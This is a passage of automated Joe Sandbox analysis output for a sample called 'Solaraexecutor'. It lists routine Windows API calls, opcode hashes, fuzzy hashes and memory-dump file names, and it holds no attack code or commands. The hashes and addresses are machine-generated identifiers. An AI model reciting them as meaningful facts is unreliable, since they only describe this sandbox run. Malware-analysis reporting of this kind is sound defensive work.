                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$FileHandleRead
                                                      • String ID:
                                                      • API String ID: 2244327787-0
                                                      • Opcode ID: 2e9153bcfe05bcbbd7feba5e88c7fe2feb6ed26c3a251c1987f05aed36ef8706
                                                      • Instruction ID: 3321c758b029292f1c65896c3d8638e68bdc498d1f992d61d51acd3e333b67cb
                                                      • Opcode Fuzzy Hash: 2e9153bcfe05bcbbd7feba5e88c7fe2feb6ed26c3a251c1987f05aed36ef8706
                                                      • Instruction Fuzzy Hash: E8110830910324EBDF205F24EC1466AF7A9FF62369F188529F866C6290D770CE44DB71
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00D43F73,00000000,00000000,?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue), ref: 00D4AD66
                                                      • GetLastError.KERNEL32(?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue,00D57970,FlsSetValue,00000000,00000364,?,00D498B7), ref: 00D4AD72
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00D4ACDB,00D43F73,00000000,00000000,00000000,?,00D4AED8,00000006,FlsSetValue,00D57970,FlsSetValue,00000000), ref: 00D4AD80
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: e4ea9e789402ce15dd6773caca185e4b72c35f3dc355adf11a7fd0a32c6263f7
                                                      • Instruction ID: cab98e33b93601e0158da158ed0975ba6d5b6cecebaead5bb98c73408390af8a
                                                      • Opcode Fuzzy Hash: e4ea9e789402ce15dd6773caca185e4b72c35f3dc355adf11a7fd0a32c6263f7
                                                      • Instruction Fuzzy Hash: 5D01F736A91322ABC7224E6C9C44A577B58EF457B3B290624FD56D7690E720D80186F1
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D2D343,00000001,?,?,?,00000000,00D3551D,?,?,?), ref: 00D29F9E
                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00D3551D,?,?,?,?,?,00D34FC7,?), ref: 00D29FE5
                                                      • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D2D343,00000001,?,?), ref: 00D2A011
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: FileWrite$Handle
                                                      • String ID:
                                                      • API String ID: 4209713984-0
                                                      • Opcode ID: 7ef12e4726f785d41a6ee12c4a8b0cefb5345f14bcba32a0e6b03433cc4eef08
                                                      • Instruction ID: 6d4cd3c7a3245854a65dc94141806a6c5a063f4b93af071444ea82f06b751966
                                                      • Opcode Fuzzy Hash: 7ef12e4726f785d41a6ee12c4a8b0cefb5345f14bcba32a0e6b03433cc4eef08
                                                      • Instruction Fuzzy Hash: BC31E431208325AFDB14CF28E918B6EB7A5FFA4719F04491DF98197290C775AD48CBB2
                                                      APIs
                                                        • Part of subcall function 00D2C27E: _wcslen.LIBCMT ref: 00D2C284
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A2D9
                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A30C
                                                      • GetLastError.KERNEL32(?,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A329
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$ErrorLast_wcslen
                                                      • String ID:
                                                      • API String ID: 2260680371-0
                                                      • Opcode ID: 28b855c997e091474f8f657a57a451e5cc4adec26a5bad218e76293cea1f051e
                                                      • Instruction ID: 4ac923d6e4607f8ea3a9e3a6ef32e0203978adcc7f9cb4bd8b04447f57327b0a
                                                      • Opcode Fuzzy Hash: 28b855c997e091474f8f657a57a451e5cc4adec26a5bad218e76293cea1f051e
                                                      • Instruction Fuzzy Hash: 0001B131200330ABEF21EBBD6C09BEE3348DF2A789F084455F941E61C1DB64DE8186B6
                                                      APIs
                                                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00D4B8B8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Info
                                                      • String ID:
                                                      • API String ID: 1807457897-3916222277
                                                      • Opcode ID: 8effc6d7ffdfa8135f33289664fa0da4eaf5e18e1d9edb8e8d135c1e20e744a5
                                                      • Instruction ID: 4203aed9ab84727d8e4b65b44059429b5c195810166f055e9c0b36bba6c8ca0c
                                                      • Opcode Fuzzy Hash: 8effc6d7ffdfa8135f33289664fa0da4eaf5e18e1d9edb8e8d135c1e20e744a5
                                                      • Instruction Fuzzy Hash: 3B41F67050438C9BDF218E288C84BF6BBE9EB65314F1804EEE6DA86142D375EA459F70
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00D4AFDD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 2568140703-3893581201
                                                      • Opcode ID: 4c4ffb0ed18a012e8448f1f4199a62675c06b89c803d3d4b37b756fa0da128d2
                                                      • Instruction ID: 19a624053efec41c54cafe6d7229f995aadd95054db9f038077a94543f824298
                                                      • Opcode Fuzzy Hash: 4c4ffb0ed18a012e8448f1f4199a62675c06b89c803d3d4b37b756fa0da128d2
                                                      • Instruction Fuzzy Hash: 1B012232644209BBCF02AF94EC02DEE7F66EF08751F054154FE1866260CB328A35AFA1
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00D4A56F), ref: 00D4AF55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpin
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 2593887523-3084827643
                                                      • Opcode ID: 33dd2ba9fa4854867f5a44840a7a1be68982924a5ac5441c913fa12ee8ddc359
                                                      • Instruction ID: 18886016da4646cca715c39a93edd07e1d6ed9240924d81e93da8cdfbad5487c
                                                      • Opcode Fuzzy Hash: 33dd2ba9fa4854867f5a44840a7a1be68982924a5ac5441c913fa12ee8ddc359
                                                      • Instruction Fuzzy Hash: 93F0B431A85308BFCF025F54DC02C9EBF61EF04752B004054FC0896260DA715E14DFB5
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: FlsAlloc
                                                      • API String ID: 2773662609-671089009
                                                      • Opcode ID: 49f2c6f0c6b8d471b8c89918463c8db5eea77c4bb89462a97d5ecbd1314937fd
                                                      • Instruction ID: 4f915f59640ef986be84cff4e4e8728d51960e9e4f94ab68dc9801f3e7447b26
                                                      • Opcode Fuzzy Hash: 49f2c6f0c6b8d471b8c89918463c8db5eea77c4bb89462a97d5ecbd1314937fd
                                                      • Instruction Fuzzy Hash: F6E0E531B853187BCA01AB69EC02D6EBB55DB04762B110199FC0597340DE705E448EFA
                                                      APIs
                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00D3EAF9
                                                        • Part of subcall function 00D3E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D3E8D0
                                                        • Part of subcall function 00D3E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D3E8E1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                      • String ID: 3Uo
                                                      • API String ID: 1269201914-397643623
                                                      • Opcode ID: 2081f2942de1caf57a58cb109f71b8070f38f1cf96e488bb3917aa583697777f
                                                      • Instruction ID: 863e0e8e3443e2bb5e30a7c18930dfa3f350867f2d4215758bacc711e1c03967
                                                      • Opcode Fuzzy Hash: 2081f2942de1caf57a58cb109f71b8070f38f1cf96e488bb3917aa583697777f
                                                      • Instruction Fuzzy Hash: 48B012C72AA242BC350872001D02C37430CC0C0F91730902EFC04C80D1DC804D0A0471
                                                      APIs
                                                        • Part of subcall function 00D4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D4BA44,?), ref: 00D4B7E6
                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00D4BA89,?,00000000), ref: 00D4BC64
                                                      • GetCPInfo.KERNEL32(00000000,00D4BA89,?,?,?,00D4BA89,?,00000000), ref: 00D4BC77
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 3dc0de5d1e9b942bd17f2a2a15232e49a313b3c24afa50075ee50e684a50ed5a
                                                      • Instruction ID: d607eedc1adbeeeaddda29fb2d3d3b66b8fff1712eacf32b07a9318b02b8b3ab
                                                      • Opcode Fuzzy Hash: 3dc0de5d1e9b942bd17f2a2a15232e49a313b3c24afa50075ee50e684a50ed5a
                                                      • Instruction Fuzzy Hash: 8E512270D003459FDB249F75C8816BABBF4EF61320F1844AFD4968B261DB35DA468BB0
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00D29A50,?,?,00000000,?,?,00D28CBC,?), ref: 00D29BAB
                                                      • GetLastError.KERNEL32(?,00000000,00D28411,-00009570,00000000,000007F3), ref: 00D29BB6
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: fb03b6e0978f0e121d278ce1d0cf290fe2942056527beff8ed04eb2cfacc4a00
                                                      • Instruction ID: 12e8bf3f938cc63a17ec149b1555c7845c1fc9cc41def78d570dd2c813925711
                                                      • Opcode Fuzzy Hash: fb03b6e0978f0e121d278ce1d0cf290fe2942056527beff8ed04eb2cfacc4a00
                                                      • Instruction Fuzzy Hash: E0419D319043218BDB249F29F5A446AF7E5FFF4329F188A2DE88583260D770ED458AB1
                                                      APIs
                                                        • Part of subcall function 00D497E5: GetLastError.KERNEL32(?,00D61030,00D44674,00D61030,?,?,00D43F73,00000050,?,00D61030,00000200), ref: 00D497E9
                                                        • Part of subcall function 00D497E5: _free.LIBCMT ref: 00D4981C
                                                        • Part of subcall function 00D497E5: SetLastError.KERNEL32(00000000,?,00D61030,00000200), ref: 00D4985D
                                                        • Part of subcall function 00D497E5: _abort.LIBCMT ref: 00D49863
                                                        • Part of subcall function 00D4BB4E: _abort.LIBCMT ref: 00D4BB80
                                                        • Part of subcall function 00D4BB4E: _free.LIBCMT ref: 00D4BBB4
                                                        • Part of subcall function 00D4B7BB: GetOEMCP.KERNEL32(00000000,?,?,00D4BA44,?), ref: 00D4B7E6
                                                      • _free.LIBCMT ref: 00D4BA9F
                                                      • _free.LIBCMT ref: 00D4BAD5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorLast_abort
                                                      • String ID:
                                                      • API String ID: 2991157371-0
                                                      • Opcode ID: d3804fb7d1d3eb6c0d9d73877ac1e62baf4eb05cab537e367aa3d66acdb01c84
                                                      • Instruction ID: 0f6682832767dab337e91f8961ab6f2c45898dcc57a4737b9db17e561f5c8575
                                                      • Opcode Fuzzy Hash: d3804fb7d1d3eb6c0d9d73877ac1e62baf4eb05cab537e367aa3d66acdb01c84
                                                      • Instruction Fuzzy Hash: 1531A431904209AFDB14EFA9D442B9DB7F5EF50330F25449AE9149B2A2EB72DE40DB70
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 00D21E55
                                                        • Part of subcall function 00D23BBA: __EH_prolog.LIBCMT ref: 00D23BBF
                                                      • _wcslen.LIBCMT ref: 00D21EFD
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: H_prolog$_wcslen
                                                      • String ID:
                                                      • API String ID: 2838827086-0
                                                      • Opcode ID: a7492163218584494135390fd2610ea764cefed8688c79dc6d573158c6d0aa0d
                                                      • Instruction ID: dfa4fd7fe0e3ccbc3cadd60ae767dd488e6d5c8a2df913beda7b5759eda1a4dd
                                                      • Opcode Fuzzy Hash: a7492163218584494135390fd2610ea764cefed8688c79dc6d573158c6d0aa0d
                                                      • Instruction Fuzzy Hash: CE315876904219ABCF11EF98D945AEEFBF6EF28304F2440A9F845A3251CB325E04CB70
                                                      APIs
                                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D273BC,?,?,?,00000000), ref: 00D29DBC
                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00D29E70
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: File$BuffersFlushTime
                                                      • String ID:
                                                      • API String ID: 1392018926-0
                                                      • Opcode ID: bcd584c2dc8f902646e49d840f8e2c7629018ed95e4943fc6ceb6f87df32ecd4
                                                      • Instruction ID: 1258eb29e4b7a7fd3da9eeb6b5f42cec494ee8d2b4adaa1b74b7906254da2dd0
                                                      • Opcode Fuzzy Hash: bcd584c2dc8f902646e49d840f8e2c7629018ed95e4943fc6ceb6f87df32ecd4
                                                      • Instruction Fuzzy Hash: 4821D031249356ABC714DF74D8A1AABFBE4AFA5708F08491CF4C587181D329E90D9B72
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D29F27,?,?,00D2771A), ref: 00D296E6
                                                      • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D29F27,?,?,00D2771A), ref: 00D29716
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 201efac70d509cf30bd7216b4707d20015bafbbea6673dbea39a3c70adc760ce
                                                      • Instruction ID: 432e550c029b5e5be548bce0e275ada364184fcea2a6dff5304ca122ddb65691
                                                      • Opcode Fuzzy Hash: 201efac70d509cf30bd7216b4707d20015bafbbea6673dbea39a3c70adc760ce
                                                      • Instruction Fuzzy Hash: 85210071104354AFE3308A65DC89FB7B7DCEB6932AF040A19FAD6C21C1C7B4A8848631
                                                      APIs
                                                      • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D29EC7
                                                      • GetLastError.KERNEL32 ref: 00D29ED4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer
                                                      • String ID:
                                                      • API String ID: 2976181284-0
                                                      • Opcode ID: bc97cd410f2c4e8a2891b4a697d085df1e3e0d1413f39c9971ff02dac085134a
                                                      • Instruction ID: 8da971542a796bdf5015642ea301b130c1f769c70324b1bd13423c62e0068aac
                                                      • Opcode Fuzzy Hash: bc97cd410f2c4e8a2891b4a697d085df1e3e0d1413f39c9971ff02dac085134a
                                                      • Instruction Fuzzy Hash: 1F112570600320ABD724C628D860BA6F3E8AF24374F540A29F4A2D26D0E3B0ED45C770
                                                      APIs
                                                      • _free.LIBCMT ref: 00D48E75
                                                        • Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38
                                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D61098,00D217CE,?,?,00000007,?,?,?,00D213D6,?,00000000), ref: 00D48EB1
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true
                                                      • Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
